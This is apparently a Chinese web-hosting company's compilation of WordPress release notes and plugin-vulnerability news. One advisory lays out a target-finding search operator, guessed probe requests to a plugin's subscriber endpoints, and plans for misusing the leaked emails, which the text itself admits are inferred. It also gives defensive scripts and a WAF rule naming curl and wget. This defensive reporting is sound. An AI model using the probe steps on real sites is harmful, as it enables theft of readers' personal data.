性能得到提升 WordPress 6.3 具有 170 多项性能更新,包括对脚本 API 的延迟和异步支持以及对图像的 fetchpriority 支持。这些改进可以缩短访问者感知到的网站加载时间,以及区块模板分辨率、图像延迟加载和表情符号加载器。 无障碍仍然是核心焦点 WordPress 6.3 在整个平台上融入了 50 多项可访问性改进,比以往任何时候都更容易访问。改进的标签、优化的选项卡和箭头键导航、修订的标题层次结构以及管理图像编辑器中的新控件使使用辅助技术的用户可以更轻松地导航。 预览区块主题 在切换和预览站点编辑器之前体验区块主题,并提供在提交新主题之前直接自定义的选项。 设置图像的纵横比 指定纵横比并确保设计完整性,尤其是在图案中使用图像时。 不受干扰地构建您的网站 站点编辑器中现在提供无干扰设计。 重新发现顶部工具栏 改进后的顶部工具栏提供了嵌套块的父选择器、选择多个区块时的选项以及嵌入到标题栏中的新界面,并考虑了新功能。 列表视图改进 拖放到每个内容层,然后在更新的列表视图中删除您想要的任何区块。 使用模式构建模板 创建独特的模式,通过允许访问模式选择的新模式快速启动模板创建。 #### WordPress 6.3.2中文最新版更新发布 This security and maintenance release features 19 bug fixes on Core, 22 bug fixes for the Block Editor, and 8 security fixes.此安全和维护版本在Core上修复了19个错误,在Block Editor上修复了22个错误,并修复了8个安全问题。WordPress 6.3.2 is a short-cycle release. You can review a summary of the maintenance updates in this release by reading the Release Candidate announcement. Because this is a security release, it is recommended that you update your sites immediately. Backports are also available for other major WordPress releases, 4.1 and later.WordPress 6.3.2是一个短周期的版本。您可以通过阅读Release Candidate公告来查看此版本中的维护更新摘要。由于这是安全版本,建议您立即更新站点。Backports也可用于其他主要的WordPress版本,4.1及更高版本。The next major release will be version 6.4 planned for 7 November 2023.下一个主要版本将是计划于2023年11月7日发布的6.4版本。If you have sites that support automatic background updates, the update process will begin automatically.如果您的网站支持自动后台更新,更新过程将自动开始。You can download WordPress 6.3.2 from WordPress.org, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.您可以从WordPress.org下载WordPress 6.3.2,或者访问您的WordPress仪表板,单击“更新”,然后单击“立即更新”。For more information on this release, please visit the HelpHub site.有关此版本的更多信息,请访问HelpHub站点。Security updates included in this release此版本中包含的安全更新The security team would like to thank the following people for responsibly reporting vulnerabilities, and allowing them to be fixed in this release:安全团队感谢以下人员负责地报告漏洞,并允许在此版本中修复这些漏洞:Marc Montpas of Automattic for finding a potential disclosure of user email addresses.Automattic的Marc Montpas发现了用户电子邮件地址的潜在泄露。Marc Montpas of Automattic for finding an RCE POP Chains vulnerability.Automattic的Marc Montpas发现了RCE POP Chains漏洞。Rafie Muhammad and Edouard L of Patchstack along with a WordPress commissioned third-party audit for each independently identifying a XSS issue in the post link navigation block.Patchstack的Rafie Muhammad和Edouard L沿着与WordPress一起委托第三方审计,分别独立确定帖子链接导航块中的XSS问题。Jb Audras of the WordPress Security Team and Rafie Muhammad of WordPress的安全团队和Rafie穆罕默德 PatchstackPatchstack的 for each independently discovering an issue where comments on private posts could be leaked to other users. 每个人都独立地发现了一个问题,即私人帖子上的评论可能会泄露给其他用户。John Blackbourn (WordPress Security Team), John Blackbourn(WordPress安全团队), James Golovich詹姆斯·戈洛维奇, J.D GrimesJ·D·格里姆斯, Numan Turle努曼·图勒, WhiteCyberSec for each independently identifying a way for logged-in users to execute any shortcode. 用于每个独立地识别登录用户执行任何短代码的方式。mascara7784 and a third-party security audit for identifying a XSS vulnerability in the application password screen.mascara7784和第三方安全审计,用于识别应用程序密码屏幕中的XSS漏洞。Jorge Costa of the WordPress Core Team for identifying XSS vulnerability in the footnotes block.WordPress核心团队的Jorge Costa在脚注块中识别XSS漏洞。s5sS5S and 和 raouf_maklouf拉乌夫马克卢夫 for independently identifying a cache poisoning DoS vulnerability. 用于独立识别缓存中毒DoS漏洞。 #### WordPress 6.4.2更新 维护和安全更新 6.4.1 版本修复了 4 个问题。 欲了解更多,参见发行注记。 6.4.2 版本修补了安全漏洞、修正了 7 个问题。 欲了解更多,参见发行注记。 欢迎使用 WordPress 6.4.2 每个版本的 WordPress 都能赋予您创作自由,WordPress 6.4 也不例外。网站编辑、设计和写作体验的新功能和升级,让您的创意天衣无缝地成形。借助 WordPress 6.4 的灵活性和强大功能,提升您的网站建设之旅。 哈喽Twenty Twenty-Four 使用 Twenty Twenty-Four 体验网站编辑的最新进展。新的默认主题考虑了三种不同的使用情况,其多功能性使其成为几乎所有类型网站的理想选择。您只需稍加调整,就能深入了解其模板和模式集合,开启一个充满创意的世界。 为图片添加灯箱效果 只需点击一下,即可打开灯箱功能,获得全屏互动图像。将其应用于全局或特定图片,以定制查看体验。 分类和过滤模式 按类别整理已同步和未同步的图案。在插入器的 "模式 "部分探索高级过滤功能,更直观地找到所有样板。 使用命令调板完成更多工作 全新的设计和更多的命令,让您在创建过程中查找所需内容、高效执行任务并节省时间。 重新命名区块组 为组块设置自定义名称,可轻松组织和区分内容的各个部分。这些名称将在列表视图中可见。 列表视图中的图像预览 为列表视图中的图库和图像块新增了媒体预览功能,让您一目了然地查看和定位内容中的图像位置。 跨站点共享样板 需要在其他网站上使用您的自定义样板?很简单!从网站编辑器的模式视图中导入或导出它们为 JSON 文件。 享受新的写作改进 新的增强功能可确保您的内容创建之旅顺利进行。在列表视图中找到新的键盘快捷键,改进列表合并功能,并增强对链接设置的控制。导航、列表和报价块的工具栏体验经过改进,具有凝聚力,可让您高效地使用所需的工具选项。 利用更多设计工具打造你的创意构想 在组块中使用新的背景图片发挥创意,并通过占位符的宽高比确保图片尺寸一致。您想在导航区块中添加按钮吗?现在无需自定义 CSS 即可轻松实现。如果您使用的是同步图案,对齐设置将保持不变,为您带来无缝的图案创建体验。 引入区块钩子 区块钩子是一项新的强大功能,可使插件自动将区块插入到与另一个区块相对应的内容中。可以把它看作是让你更直观地使用区块的建议。新的 "插件 "面板让你完全可以根据自己的需要来匹配它们--根据需要添加、取消和重新排列区块钩子。 性能 WordPress 6.4 包含 100 多项性能更新,带来更快、更高效的体验。增强的重点是区块主题和经典主题的模板加载性能,核心、块和主题中脚本加载策略 "defer "和 "async "的使用,以及自动加载选项的优化。 无障碍 每个版本都致力于让每个人都能使用 WordPress。6.4 带来了列表视图改进和导航块的ria-标签支持等亮点。管理用户界面(UI)包括对按钮位置、"添加新内容 "菜单项上下文和网站健康状况口语信息的改进。 了解 WordPress 6.4.2 Learn WordPress 是面向 WordPress 新老用户的免费资源。Learn中包含关于如何使用WordPress中各种功能的视频、用于深入探讨主题的交互式研讨会,以及用于深入研究WordPress特定领域的课程计划。 #### WordPress 6.4更新 欢迎使用 WordPress 6.4 每个版本的 WordPress 都能赋予您创作自由,WordPress 6.4 也不例外。网站编辑、设计和写作体验的新功能和升级,让您的创意天衣无缝地成形。借助 WordPress 6.4 的灵活性和强大功能,提升您的网站建设之旅。 哈喽Twenty Twenty-Four 使用 Twenty Twenty-Four 体验网站编辑的最新进展。新的默认主题考虑了三种不同的使用情况,其多功能性使其成为几乎所有类型网站的理想选择。您只需稍加调整,就能深入了解其模板和模式集合,开启一个充满创意的世界。 为图片添加灯箱效果 只需点击一下,即可打开灯箱功能,获得全屏互动图像。将其应用于全局或特定图片,以定制查看体验。 分类和过滤模式 按类别整理已同步和未同步的图案。在插入器的 "模式 "部分探索高级过滤功能,更直观地找到所有样板。 使用命令调板完成更多工作 全新的设计和更多的命令,让您在创建过程中查找所需内容、高效执行任务并节省时间。 重新命名区块组 为组块设置自定义名称,可轻松组织和区分内容的各个部分。这些名称将在列表视图中可见。 列表视图中的图像预览 为列表视图中的图库和图像块新增了媒体预览功能,让您一目了然地查看和定位内容中的图像位置。 跨站点共享样板 需要在其他网站上使用您的自定义样板?很简单!从网站编辑器的模式视图中导入或导出它们为 JSON 文件。 享受新的写作改进 新的增强功能可确保您的内容创建之旅顺利进行。在列表视图中找到新的键盘快捷键,改进列表合并功能,并增强对链接设置的控制。导航、列表和报价块的工具栏体验经过改进,具有凝聚力,可让您高效地使用所需的工具选项。 利用更多设计工具打造你的创意构想 在组块中使用新的背景图片发挥创意,并通过占位符的宽高比确保图片尺寸一致。您想在导航区块中添加按钮吗?现在无需自定义 CSS 即可轻松实现。如果您使用的是同步图案,对齐设置将保持不变,为您带来无缝的图案创建体验。 引入区块钩子 区块钩子是一项新的强大功能,可使插件自动将区块插入到与另一个区块相对应的内容中。可以把它看作是让你更直观地使用区块的建议。新的 "插件 "面板让你完全可以根据自己的需要来匹配它们--根据需要添加、取消和重新排列区块钩子。 性能 WordPress 6.4 包含 100 多项性能更新,带来更快、更高效的体验。增强的重点是区块主题和经典主题的模板加载性能,核心、块和主题中脚本加载策略 "defer "和 "async "的使用,以及自动加载选项的优化。 无障碍 每个版本都致力于让每个人都能使用 WordPress。6.4 带来了列表视图改进和导航块的ria-标签支持等亮点。管理用户界面(UI)包括对按钮位置、"添加新内容 "菜单项上下文和网站健康状况口语信息的改进。 了解 WordPress 6.4 Learn WordPress 是面向 WordPress 新老用户的免费资源。Learn中包含关于如何使用WordPress中各种功能的视频、用于深入探讨主题的交互式研讨会,以及用于深入研究WordPress特定领域的课程计划。 探索 WordPress 6.4 Field Guide。通过详细的开发人员说明了解此版本中的更改,以帮助您使用 WordPress 构建。 阅读 WordPress 6.4 发行说明,了解有关安装、增强功能、修复问题、发行贡献者、学习资源和文件更改列表的信息。 #### WordPress 6.5 爆 XSS 漏洞,站长需尽快更新到 6.5.2 近日,WordPress 6.5 爆出的 XSS 漏洞是一种安全漏洞,可能导致恶意攻击者在受影响的 WordPress 网站上执行恶意脚本,危害用户的数据安全和隐私。该漏洞存在于 WordPress 核心或相关插件和主题中,可能允许攻击者注入恶意代码,从而窃取用户信息、篡改网站内容等。 根据搜索结果,WordPress 6.5 版本中发现了一个跨站点脚本(XSS)漏洞。这种类型的漏洞可以让攻击者在用户的浏览器中执行脚本,从而进行各种恶意操作。该漏洞被评为中等威胁,CVSS 评分为 6.4。漏洞可能源于对用户输入数据的处理不当,如未经验证或清理就将其输出到页面,导致恶意脚本可以被执行。 XSS 漏洞的利用通常需要攻击者具备一定的技术能力。攻击者可能会构造特定的输入数据,这些数据中包含了恶意脚本代码,并通过各种途径诱导用户点击或输入,从而触发漏洞。例如,攻击者可能在评论或论坛中植入恶意代码,当其他用户浏览含有该评论的页面时,恶意代码就会执行。 针对 XSS 漏洞,WordPress 官方发布了 6.5.2 版本,该版本修复了多个安全漏洞,包括 XSS 漏洞。建议所有用户立即更新到最新版本,以修复这些安全问题。此外,可以使用安全插件如 Wordfence 或 Sucuri 来进行主动监测和防护,减少漏洞被利用的风险。 #### WordPress 6.5.4更新发布 官方下载地址 维护和安全更新 6.5.4 版本修复了 5 个问题。 更改日志 wp-admin/css/common-rtl.csswp-admin/css/common-rtl.min.csswp-admin/css/common.csswp-admin/css/common.min.csswp-admin/js/updates.jswp-admin/js/updates.min.jswp-includes/class-wp-plugin-dependencies.phpwp-includes/version.php 欢迎使用 WordPress 6.5.4 使用 WordPress 6.5,让您的建站体验更上一层楼。通过新功能和增强功能,探索更多属于自己的途径,这将有助于微调您的创意作品。了解开发人员体验的最新添加内容,全新的基础工具将改变区块的未来。 #### WordPress 6.7 后台无法更新怎么办? 最近,WordPress 官方版进行了更新,最新版本的6.7已经更新了,不过国内使用WordPress的可能有些麻烦,因为后台根本无法自动更新,一直显示下载中。 原因是WordPress 6.7版本太大,国内服务器下载慢,往往因为下载超时导致无法更新。 这个时候怎么办呢? 主机邦的操作是手动下载,只需要官方下载6.7版本到本地服务器上。 WordPress 6.7官方链接https://downloads.wordpress.org/release/zh_CN/wordpress-6.7.zip 然后把压缩包里的wp-content文件夹删了 再把剩余的文件直接上传覆盖到原来的网站服务器文件上。 再通过浏览器访问你的域名https://你的博客地址/wp-admin/upgrade.php,执行升级即可。 #### WordPress 6.8版本更新 每一个WordPress版本都是为了庆祝一位在音乐上留下不可磨灭印记的艺术家。 代号为“塞西尔”的WordPress 6.8向传奇钢琴家和爵士乐先驱塞西尔泰勒致敬。 Classically trained yet relentlessly unconventional, Taylor reimagined the piano as a percussive instrument—layering tone clusters, polyphony, and rhythm into a sound both chaotic and precise. His music defied expectation, finding form in disorder and harmony in dissonance. 同样的精神驱动着WordPress 6.8。拥抱其大胆的新功能与相同的好奇心和实验,定义塞西尔的声音。 欢迎使用WordPress! WordPress 6.8优化和改进了您每天使用的工具,使您的网站更快,更安全,更易于管理。 “样式手册”现在具有结构化布局并可与“经典”主题一起使用,使您能够更好地控制全局样式。推测加载通过在用户导航到链接之前预加载链接来加速导航,bcrypt哈希自动增强密码安全性,数据库优化提高性能。 下载WordPress 6.8“塞西尔” 一个释放抛光到一个高光泽。 样式书得到了一个更干净的外观和一些新的技巧。 样式书有一个新的,结构化的布局和更清晰的标签,使它更容易编辑颜色,排版-几乎所有的网站样式-在一个地方。 另外,现在您可以在具有编辑器样式或theme.json文件的Classic主题中看到它。 在外观设计下找到样式手册,并在编辑CSS或在定制器中进行更改时使用它来预览主题的演变。 编辑器改进 在数据视图中查看选项的方式更多样,您可以从查询循环中排除粘性帖子。 另外,你会发现编辑器中有很多小的改进,可以让你顺利地完成你构建的所有东西。 几乎即时的页面加载,这要归功于推测加载 在WordPress 6.8中,页面加载速度比以往任何时候都快。 当您或您的用户悬停或单击链接时,WordPress可能会预加载下一个页面,以获得更流畅,近乎即时的体验。该系统平衡了速度和效率,您可以使用插件或自己的代码控制它的工作方式。 此功能只适用于现代浏览器-旧的浏览器将简单地忽略它没有任何影响。 使用bcrypt增强密码安全性 现在,使用bcrypt哈希算法破解密码变得更加困难,这需要更多的计算能力来破解。 这增强了整体安全性,就像WordPress的其他加密改进一样。 你不需要做任何事情-一切都会自动更新。 无障碍环境的改善 100多个可访问性修复和增强触及WordPress体验的广泛范围。 此版本包括对每个捆绑主题的修复,对导航菜单管理的改进,定制器和简化的标签。 块编辑器对块、数据视图及其整体用户体验进行了70多项改进。 性能更新 WordPress 6.8包含了广泛的性能修复和增强功能,以加快从编辑到浏览的所有操作。 除了推测性加载,WordPress 6.8特别关注块编辑器,块类型注册和查询缓存。 另外,想象一下任何交互的等待时间都不会超过50毫秒。 在WordPress 6.8中,Interactivity API向这个目标迈出了第一步。 等等 如需全面概述WordPress 6.8中的所有新功能和增强功能,请访问功能展示网站。 #### WordPress CDN缓存策略 很多 WordPress 做网站的同学,在使用CDN的时候,缓存策略做得不好,容易变卡,变慢。 今天主机吧就根据自己网站使用的情况,分享下WordPress在使用CDN的时候如何做缓存策略。 首先,主机吧使用静态文件缓存,网站需要缓存的静态文件做缓存。 其中把以下静态文件后缀加入缓存名单。jpg,jpeg,gif,png,bmp,webp,mp4,flv,avi,mov,wmv,mp3,wma,wav,css,js,txt,xml,ttf,otf,woff,woff2,rar,zip,svg,pdf 这些都是静态文件,平时不需要改动,而且缓存后对网站的动态请求功能方面不会有任何影响,至于缓存时间自己看着弄,尽量做长点,因为这样CDN回源少,服务器压力会小很多。 然后我们把wp-content、wp-includes这两个目录下的文件做全缓存。 这个是从LiteSpeed缓存 CDN缓存功能学到的,这个插件默认CDN缓存这两个目录,主机吧试了下,做全缓存后,没有任何错误,而且网站访问速度快很多。 网页请求的一些带参数的JS、CSS、字体资源都可以缓存到,使得wordpress 除了一些必要的动态请求外,几乎所有的静态资源都得到了缓存,网站快了很多。 主机吧目前用的是百度云防护的CDN加速,可以看下演示站:https://zhujib.com #### WordPress Follow My Blog Post插件曝数据泄露漏洞,博客用户隐私面临风险 漏洞事件概述:订阅功能背后的安全隐患 漏洞编号:CNVD-2026-00008(对应CVE-2025-64258)危害等级:高危(CVSS评分高,攻击复杂度低,无需身份验证)影响版本:WordPress Follow My Blog Post插件 <= 2.3.9 所有版本漏洞性质:敏感信息泄露公开时间:2026年1月4日攻击特点:远程攻击者无需任何凭证即可利用该漏洞访问敏感数据 插件背景与漏洞深度分析 Follow My Blog Post插件功能解析 这是一个专门为博客网站设计的用户互动插件,主要功能包括: 文章订阅:允许读者订阅特定博主或文章更新 邮件通知:当订阅的内容有新更新时自动邮件通知 用户管理:管理订阅者列表和偏好设置 数据统计:提供订阅者活跃度分析 使用场景:个人博客、媒体网站、内容平台等需要读者互动功能的WordPress站点。 漏洞技术本质:什么是“检索嵌入的敏感数据”? 基于Patchstack的安全公告和同类漏洞模式分析,该漏洞可能涉及: API端点未授权访问:插件提供的REST API端点缺乏适当的权限验证 数据库直接暴露:SQL查询未过滤敏感字段,返回完整数据记录 短代码/小工具数据泄露:前端显示组件意外暴露后台数据 AJAX回调函数无校验:用于动态加载的PHP函数未验证调用者权限 受影响的数据类型可能包括: 订阅者隐私信息:订阅用户的邮箱地址、订阅时间、IP地址 博客运营数据:订阅统计数据、用户活跃时间、地理位置 系统配置信息:邮件服务器配置、API密钥(如果插件集成第三方服务) 用户行为数据:阅读偏好、订阅的文章类别、通知频率设置 攻击路径推演与危害评估 攻击者利用步骤(基于典型WordPress插件漏洞模式) 第一步:目标识别 攻击者通过以下方式发现目标: - Google搜索:inurl:"/wp-content/plugins/follow-my-blog-post/" - WPScan等工具扫描 - 监测WordPress站点常用的插件组合 第二步:漏洞探测 尝试访问可能泄露数据的端点: GET /wp-json/follow-my-blog/v1/subscribers GET /wp-admin/admin-ajax.php?action=fmbp_get_data GET /?rest_route=/follow-my-blog/v1/stats POST /wp-json/wp/v2/fmbp_subscriptions 第三步:数据提取 使用脚本批量获取敏感信息: - 导出所有订阅者邮箱列表 - 获取订阅关系图谱(哪些用户订阅了哪些作者) - 提取用户订阅偏好设置 第四步:数据利用 1. 营销滥用:将邮箱列表出售给垃圾邮件发送者 2. 精准钓鱼:针对特定博客的读者发送伪装成博客更新的钓鱼邮件 3. 竞争分析:分析竞争对手博客的读者群体特征 4. 二次攻击:利用获取的信息进行社工攻击 实际风险量化分析 假设一个中型博客平台: 活跃博主:500位 订阅用户:50,000人 日均新订阅:200人 数据泄露后果: 直接损失: 1. 隐私合规罚款:按照《个人信息保护法》,最高可达5000万元或上年度营业额5% 2. 用户流失率:预计15-30%的订阅者因隐私担忧取消订阅 3. 品牌声誉:媒体曝光导致品牌价值受损 间接风险: 1. 钓鱼攻击成功率提升:攻击者可发送高度个性化的钓鱼邮件 2. 跨站数据关联:结合其他泄露数据,构建完整的用户画像 3. 法律诉讼:集体诉讼风险,特别是涉及欧盟GDPR管辖的用户 紧急修复与验证指南 立即行动清单(发现漏洞后30分钟内) 第一步:快速检测受影响状态 # 检查插件版本 cd /path/to/wordpress/wp-content/plugins/ if [ -d "follow-my-blog-post" ]; then version=$(grep -i "version" follow-my-blog-post/readme.txt | head -1) echo "当前版本:$version" # 版本比较(<= 2.3.9为受影响版本) if [[ "$version" =~ 2\.3\.[0-9] ]] || [[ "$version" < "2.3.9" ]]; then echo "⚠️ 当前版本存在漏洞,需立即处理!" fi fi # 检查最近是否有可疑访问 grep -i "follow-my-blog" /var/log/nginx/access.log | tail -50 第二步:修复措施(二选一) 方案A:直接升级(推荐) 1. 登录WordPress管理后台 2. 进入【插件】→【已安装插件】 3. 找到“Follow My Blog Post” 4. 点击“立即更新” 5. 确认更新到2.4.0或更高版本 方案B:临时禁用(应急处理) 1. 如果不立即需要此功能: - 后台停用插件 - 或直接重命名插件目录: mv follow-my-blog-post follow-my-blog-post_DISABLED 2. 通知用户:在网站显著位置说明订阅功能暂时维护 第三步:修复验证 <?php // 验证脚本 - test_fmbp_security.php require_once('wp-load.php'); $test_cases = [ [ 'url' => home_url('/wp-json/follow-my-blog/v1/subscribers'), 'method' => 'GET', 'expected' => 401 // 未授权应返回401 ], [ 'url' => home_url('/wp-admin/admin-ajax.php'), 'data' => ['action' => 'fmbp_get_subscribers'], 'method' => 'POST', 'expected' => 403 ] ]; foreach ($test_cases as $test) { $args = ['timeout' => 10, 'redirection' => 0]; if ($test['method'] === 'POST') { $args['method'] = 'POST'; $args['body'] = $test['data']; } $response = wp_remote_request($test['url'], $args); $code = wp_remote_retrieve_response_code($response); if ($code !== $test['expected']) { error_log("安全验证失败:{$test['url']} 返回 {$code}"); } } ?> 第四步:事件追溯 -- 检查数据库是否有异常查询 -- 在phpMyAdmin或MySQL命令行执行: SELECT * FROM wp_fmbp_subscribers WHERE subscribe_date > DATE_SUB(NOW(), INTERVAL 7 DAY) ORDER BY id DESC LIMIT 100; -- 查看最近的数据访问模式 SELECT DATE(subscribe_date) as day, COUNT(*) as count FROM wp_fmbp_subscribers GROUP BY day ORDER BY day DESC LIMIT 30; 深度防御:构建博客平台的多层安全体系 第一层:WAF专项防护规则 百度云防护WAF配置方案 规则一:保护Follow My Blog Post API端点 规则名称:FMBP API权限强制验证 匹配条件: - URI Path 包含 "/wp-json/follow-my-blog/" - 或 URI Path 等于 "/wp-admin/admin-ajax.php" - 且 Query String Parameter [名称为"action"] 包含 "fmbp" 生效条件:请求不包含有效的WordPress登录Cookie 处置动作:拦截 规则说明:所有FMBP相关API必须认证访问 规则二:防止订阅数据批量导出 规则名称:订阅数据频率限制 匹配条件: - URI Path 包含 "subscribers" - 或 URI Path 包含 "subscriptions" 统计信息:IP + User-Agent组合 统计时长:300秒 阈值:10次 处置动作:JS挑战 生效范围:仅作用于当前规则的匹配条件 规则三:检测异常数据访问模式 规则名称:FMBP异常数据访问检测 匹配条件: - User-Agent 包含 "Python" 或 "curl" 或 "wget" - 且 Referer 为空 或 Referer 不包含本站域名 - 且 URI Path 包含 "/wp-content/plugins/follow-my-blog-post/" 处置动作:拦截 为什么WAF在此场景下至关重要 零日防护:在插件开发者发布修复前提供即时保护 攻击特征识别:即使攻击者使用变种方法,WAF可基于行为特征识别 业务无感防护:正常用户不受影响,仅恶意请求被拦截 攻击取证:完整记录攻击尝试,便于事后分析和法律追责 第二层:WordPress核心安全加固 # Nginx配置文件强化 location ~* ^/wp-content/plugins/follow-my-blog-post/.*\.(php|phtml|php3|php4|php5|php7|phps)$ { deny all; return 403; } # 限制对插件目录的直接访问 location ~* /wp-content/plugins/ { location ~ \.php$ { deny all; } } # 保护后台操作 location /wp-admin { # 只允许特定IP段访问 allow 192.168.1.0/24; allow 办公室公网IP; deny all; # 添加HTTP基本认证 auth_basic "Administrator Login Required"; auth_basic_user_file /etc/nginx/.htpasswd_admin; } 第三层:数据库访问控制 -- 为WordPress创建最小权限数据库用户 CREATE USER 'wp_blog_user'@'localhost' IDENTIFIED BY '复杂密码@2026#01'; GRANT SELECT, INSERT, UPDATE ON `wordpress_db`.`wp_posts` TO 'wp_blog_user'@'localhost'; GRANT SELECT, INSERT, UPDATE ON `wordpress_db`.`wp_fmbp_*` TO 'wp_blog_user'@'localhost'; -- 注意:不授予DELETE、DROP、TRUNCATE权限 第四层:监控与告警配置 #!/bin/bash # 实时监控脚本 fmbp_monitor.sh LOG_FILE="/var/log/nginx/access.log" ALERT_EMAIL="admin@yourblog.com" # 监控关键词 KEYWORDS=("follow-my-blog" "fmbp" "subscription" "subscriber") tail -Fn0 "$LOG_FILE" | while read line; do for keyword in "${KEYWORDS[@]}"; do if echo "$line" | grep -iq "$keyword"; then # 提取IP和请求路径 ip=$(echo "$line" | awk '{print $1}') path=$(echo "$line" | awk '{print $7}') # 检查是否为未授权访问(无cookie) if ! echo "$line" | grep -q "wordpress_logged_in"; then # 发送告警 echo "警报时间: $(date)" > /tmp/alert.txt echo "可疑IP: $ip" >> /tmp/alert.txt echo "访问路径: $path" >> /tmp/alert.txt echo "完整记录: $line" >> /tmp/alert.txt mail -s "博客订阅插件异常访问告警" "$ALERT_EMAIL" < /tmp/alert.txt # 可选:自动封锁(谨慎使用) # iptables -A INPUT -s $ip -j DROP fi fi done done 主机帮产品解决方案推荐 1. 【百度云防护WAF专业版】- 精准应用防护 适用场景:保护博客、内容站点的应用层安全 自定义规则:针对Follow My Blog Post等插件配置专属防护 API安全:保护WordPress REST API,防止未授权数据访问 CC防护:防止恶意刷订阅、刷关注等行为 网页防篡改:保护博客内容完整性 2. 【高防服务器/高防IP】- 基础架构保障 适用场景:知名博客易受DDoS攻击,影响读者访问 流量清洗:抵御针对博客的流量型攻击 连接数控制:防止恶意订阅请求耗尽服务器资源 BGP优化:确保全球读者访问速度 3. 【SSL证书】- 数据传输加密 适用场景:保护读者与博客间的数据传输 全站HTTPS:订阅请求、登录信息全部加密传输 信任标识:增强读者信任,提升订阅转化率 SEO优势:HTTPS作为搜索排名因素之一 4. 【定期安全扫描服务】- 持续安全运营 适用场景:博客持续运营需要定期安全检查 插件漏洞扫描:每周自动检测插件安全更新 配置审计:检查WordPress配置安全性 恶意代码检测:及时发现被植入的后门、木马 应急响应:出现安全事件时快速专业支持 长期安全最佳实践 插件管理规范 来源验证:只从WordPress官方插件库或可信开发者处安装 更新策略:启用自动更新,或至少每周手动检查更新 最少安装:只安装必要的插件,定期清理不用的插件 权限审查:新安装插件后,审查其请求的权限是否合理 数据安全策略 数据脱敏:在前端显示时对敏感信息进行部分隐藏 访问日志:详细记录数据访问日志,定期审计 定期备份:确保订阅者数据定期备份,备份文件加密存储 隐私设计:默认不收集不必要信息,收集时明确告知用途 应急响应准备 预案制定:制定插件漏洞应急响应流程 团队培训:确保内容团队了解基本的安全操作 用户沟通:准备数据泄露时的用户通知模板 法律咨询:了解隐私保护相关法律要求 结语:内容创作者的安全责任 Follow My Blog Post插件漏洞事件提醒所有内容创作者和博客运营者: 读者的信任是博客最宝贵的资产,而数据安全是维护这种信任的技术基础。订阅者的邮箱地址、阅读偏好不仅是联系渠道,更是读者对博客的信任托付。 三点核心建议: 立即检查:所有使用该插件的站点必须在24小时内完成版本检查和更新 深度防护:不要依赖单一安全措施,建立从插件管理到WAF防护的多层体系 持续意识:安全是持续过程,需要定期审查插件安全状态 特别提醒:对于个人博客和小型内容站点,可能没有专业安全团队,但通过配置合适的云安全产品(如百度云防护WAF),可以以较低成本获得专业级的安全防护。 主机帮为内容创作者提供:轻量级安全解决方案,特别针对WordPress博客优化,包括一键安全加固、插件漏洞监控和应急响应支持。我们理解内容创作者的核心是内容创作,而不是安全运维,因此提供简单有效的安全托管服务。 #### WordPress InfiniteWP Client和 WP Time Capsule插件现严重的安全漏洞 1月16日 消息:据zdnet报道,WordPress的两个插件 InfiniteWP Client和 WP Time Capsule被曝出现严重的安全漏洞,估计有 32 万个网站容易被利用攻击。 这两个插件被用于在一服务器上管理多个WordPress网站,并在发布更新时为文件和数据库条目创建备份。WebArx的网络安全研究人员发现,代码中存在逻辑问题,允许他人无需密码即可登录管理员帐户。 根据WordPress插件库数据,InfiniteWP活跃在超过300, 000 个网站,而WP Time Capsule在至少活跃在20, 000 个网站上。 周二,研究小组表示,影响InfiniteWP 1.9.4. 5 以下版本的逻辑问题意味着,使用 JSON 和 Base64 编码的 POST 请求有效负载可以绕过密码请求,只需知道管理员的用户名即可登录。 而在1.21. 16 以下的WP Time Capsule版本中,函数行中的问题可以通过在原始POST请求中添加一个精心设计的字符串来调用一个函数,该函数获可取所有可用的管理员帐户,并作为列表中的第一个管理员登录。 1 月 7 日,WebArx 向这两款插件的开发者报告了这些漏洞,开发者迅速作出反应,并在一天后发布软件更新。Webarx建议网站管理员尽快安装更新避免遭受攻击,因为防火墙保护将不起作用。 #### WordPress RealHome 主题/Easy Real Estate插件曝高危漏洞 攻击者可提权至管理员 1 月 23 日消息,科技媒体 bleepingcomputer 昨日(1 月 22 日)发布博文,报道称 WordPress 主题 RealHome 和插件 Easy Real Estate 存在严重安全漏洞,未经身份验证的用户可利用漏洞获取管理员权限,数万网站面临风险。 令人担忧的是,漏洞发现者 Patchstack 自 2024 年 9 月以来多次联系供应商 InspiryThemes,但未得到任何回应,漏洞至今未修复。两个漏洞如下: RealHome 主题漏洞 (CVE-2024-32444,CVSS 评分:9.8): RealHome 是一款专为房地产经纪人和公司设计的WordPress主题,以其高度灵活性、现代化设计和强大的功能而备受推崇。它旨在通过优雅的界面展示房产信息,并简化房产管理流程 该主题存在漏洞,通过 inspiry_ajax_register 函数注册新账户,但未进行正确的授权检查和随机数验证。 攻击者可在注册请求中将自身角色指定为“管理员”,绕过安全检查,进而完全控制 WordPress 网站,进行内容篡改、植入脚本、访问用户敏感数据等操作。 据 Envato Market 数据显示,RealHome 主题已应用于 32600 个网站。 Easy Real Estate 插件漏洞 (CVE-2024-32555,CVSS 评分:9.8): Easy Real Estate 是一款专为房地产网站设计的WordPress插件,旨在帮助用户轻松管理和展示房产信息。它提供了全面的功能,支持多种定制化选项,能够满足房地产网站的多样化需求 该插件的社交登录功能存在缺陷,允许用户仅凭邮箱地址登录,而无需验证邮箱地址的真实所有者。攻击者只需知道管理员的邮箱地址,即可无需密码登录并获得管理员权限,其后果与 CVE-2024-32444 类似。 由于 InspiryThemes 尚未发布补丁,强烈建议使用 RealHome 主题或 Easy Real Estate 插件的网站所有者和管理员立即禁用它们。鉴于漏洞信息已公开,攻击者很可能正在积极扫描易受攻击的网站,因此迅速采取缓解措施至关重要。 #### WordPress tagDiv插件漏洞,数千个网站遭到黑客攻击 10月10日 消息:近日,数千个使用 WordPress 内容管理系统的网站遭到黑客攻击。该攻击者利用了名为 tagDiv Composer 的热门插件中的一个最近修补的漏洞,向网页注入恶意代码。 据了解,存在漏洞的 tagDiv Composer 插件是使用 WordPress 主题 Newspaper 和 Newsmag 必须的组件。这两个主题在 Theme Forest 和 Envato 市场上累计下载量已超过15.5万。该漏洞被追踪为 CVE-2023-3169,属于跨站脚本(XSS)漏洞类型,使攻击者能够向网页注入恶意代码。这一漏洞的严重程度评级为10分制的7.1分。tagDiv Composer4.1版本对其进行了部分修复,4.2版本实现了完整修复。 据安全研究人员 Denis Sinegubko 发布的文章,攻击者正在利用该漏洞向网页注入脚本,将访问者重定向到各种诈骗网站。这些重定向链接通常推送假冒技术支持、欺诈彩票中奖信息,以及推送通知骗局,后者通过展示假验证码对话框骗用户订阅推送通知。 Sinegubko 